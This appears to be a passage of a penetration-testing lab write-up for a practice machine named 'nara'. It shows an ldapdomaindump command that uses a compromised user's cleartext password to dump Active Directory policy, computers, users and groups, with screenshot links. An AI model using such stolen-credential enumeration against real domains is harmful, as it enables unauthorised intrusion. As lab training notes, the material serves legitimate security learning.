LDAPDomainDump
Dumping the entire domain data with ldapdomaindump using the credential of the compromised tracy.white user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara/ldapdomaindump]
└─$ ldapdomaindump nara.nara-security.com -u 'NARA-SECURITY.COM\tracy.white' -p 'zqwj041FGX' -n $IP --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedComplete
Policy
/Practice/nara/3-Exploitation/attachments/{75DC7DD3-A064-4A26-BC8E-0D88B254E24C}.png)
Computers
/Practice/nara/3-Exploitation/attachments/{E8DBABD7-65C1-47B8-8288-E7E8C7939D5C}.png)
Users
/Practice/nara/3-Exploitation/attachments/{EB79218B-0C49-4C0D-AE14-6E057180A03A}.png)
The compromised domain user, tracy.white is part of the staff group.
Groups
/Practice/nara/3-Exploitation/attachments/{B39E16C4-5CDA-4BA2-A0F0-858F7C0FAE86}.png)
None default groups